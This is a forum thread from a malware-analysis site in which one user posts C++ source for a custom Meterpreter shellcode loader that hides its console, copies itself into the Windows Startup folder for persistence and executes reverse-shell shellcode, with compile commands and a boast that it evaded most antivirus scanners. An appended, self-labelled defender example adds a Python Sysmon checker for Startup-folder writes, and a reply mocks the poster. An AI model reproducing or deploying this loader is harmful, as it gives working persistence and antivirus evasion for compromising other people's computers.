A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about user-mode development.
 #30039  by kd77
 Sun Feb 26, 2017 2:23 pm
Hi, I thought I should start contributing to this forum because it's a sound forum! :lol: :lol: :lol:

I was doing some pentesting in my hacking lab and I came across a problem when using Meterpreter. Automation and persistence, yes I know there are already premade modules for this but they're not very Anti-Virus friendly!
My overall goal was to create a custom meterpreter payload that would try and connect back to my host an infinite amount of times, and copy itself to "C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" for persistence (Yes I know if I had a meterpreter session on the hacked computer, I could just move the payload myself manually. But that takes too much time!).

So I firstly picked my payload the x86 meterpreter_reverse_tcp and generated the shellcode into a C format and removed the bad chars like '\x00' and '\xFF'.

And then I programmed this PoC custom meterpreter payload. (I've been learning C++ for a couple of weeks now so my code is not great but it gets the job done!).

#include <iostream>
#include "windows.h"

using namespace std;

unsigned char buf[] =
"\x89\xe0\xd9\xed\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" etc.. etc..

// Meterpreter generated shellcode with bad chars removed.

// http://stackoverflow.com/questions/622592/win32-programming-hiding-console-window#622666
void HideConsoleWindow()
{
 HWND HideConsoleWindow;
 AllocConsole();
 HideConsoleWindow = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(HideConsoleWindow,0);
}

// char** argv points to the location of the executable being run.
int main(int argc, char** argv)
{

HideConsoleWindow();
    // Copy file to Windows start up.
CopyFile(argv[0], "C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\copied_payload.exe", 0);

    // Declare pointer on function.
    int (*func) ();

    // Cast shellcode into function.
    func = (int (*) ()) buf;

    // Call function (Execute shellcode).
    (int) (*func) ();

    return 0;
}
And that's my payload, I compiled my source code using GCC and the following flags.
mingw32-g++.exe -Wall -O2 -fomit-frame-pointer -fexpensive-optimizations -Os -m32  -c "C:\Users\user\Documents\Code blocks\Meterpreter\main.cpp" -o obj\Release\main.o
mingw32-g++.exe  -o bin\Release\Meterpreter.exe obj\Release\main.o  -s -s -m32 -static-libgcc -static-libstdc++ 
And it worked like a charm! I also thought I'd give it an Anti-Virus scan because I was thinking the CopyFile to start up would surely flag?

https://www.virustotal.com/en/file/8773 ... 488118618/

Only 4 AVs out of 55 and the Anti-Virus I was against in my lab was avast!

I ran my custom payload on the Windows machine in my lab as admin, and escalated to NT system and no Anti-Virus flagging or Behavioural flagging came up!

Thanks for reading mate. :)
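As an added, defender-side example (not from the post above or from this forum): a small Python checker that runs over constructed Sysmon Event ID 11 (FileCreate) lines and flags executables written into a per-user or all-users Startup folder, which is the persistence step the post relies on. The line format, paths and file names are constructed for the example; only the Sysmon field names (EventID, Image, TargetFilename) are real.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample lines modelled on a key=value export of Sysmon Event ID 11.
# None of these paths or file names are real telemetry.
SAMPLE_EVENTS = [
    r"EventID=11 Image=C:\Users\alice\Downloads\Meterpreter.exe TargetFilename=C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\copied_payload.exe",
    r"EventID=11 Image=C:\Program Files\Vendor\setup.exe TargetFilename=C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Vendor Tray.lnk",
    r"EventID=11 Image=C:\Windows\explorer.exe TargetFilename=C:\Users\alice\Documents\notes.txt",
    r"EventID=11 Image=C:\Windows\explorer.exe TargetFilename=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\agent.exe",
]

# Matches a file placed directly in any Startup folder (user profile or all-users).
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+$")
# Extensions that run code when Windows processes the Startup folder at logon.
EXEC_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1"}
# Writers running from user-writable locations are more suspicious than installers.
USER_WRITABLE_RE = re.compile(r"\\(downloads|temp|appdata)\\", re.IGNORECASE)


def parse_event(line):
    """Split 'Key=Value Key=Value' text into a dict; values may contain spaces."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r"(\w+)=(.*?)(?= \w+=|$)", line)}


def flag_startup_write(line):
    """Return a finding dict for a FileCreate into a Startup folder, else None."""
    ev = parse_event(line)
    if ev.get("EventID") != "11":
        return None
    target = ev.get("TargetFilename", "")
    if not STARTUP_RE.search(target.lower()):
        return None
    ext = PureWindowsPath(target).suffix.lower()
    image = ev.get("Image", "")
    # A shortcut (.lnk) from an installer is routine; an executable dropped
    # straight into Startup, especially by a process running from a user-writable
    # directory, is the pattern described in the post.
    if ext in EXEC_EXT and USER_WRITABLE_RE.search(image):
        severity = "high"
    elif ext in EXEC_EXT:
        severity = "medium"
    else:
        severity = "low"
    return {"severity": severity, "image": image, "target": target}


def scan(lines):
    """Apply flag_startup_write to every line and keep the findings."""
    return [f for f in map(flag_startup_write, lines) if f]
```

A real deployment would read these fields from the Sysmon event log rather than a text export, but the path test and the severity logic carry over unchanged.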
 #30041  by EP_X0FF
 Sun Feb 26, 2017 4:54 pm
Wow. So impressive. So FUD. I think you registered on the wrong forum.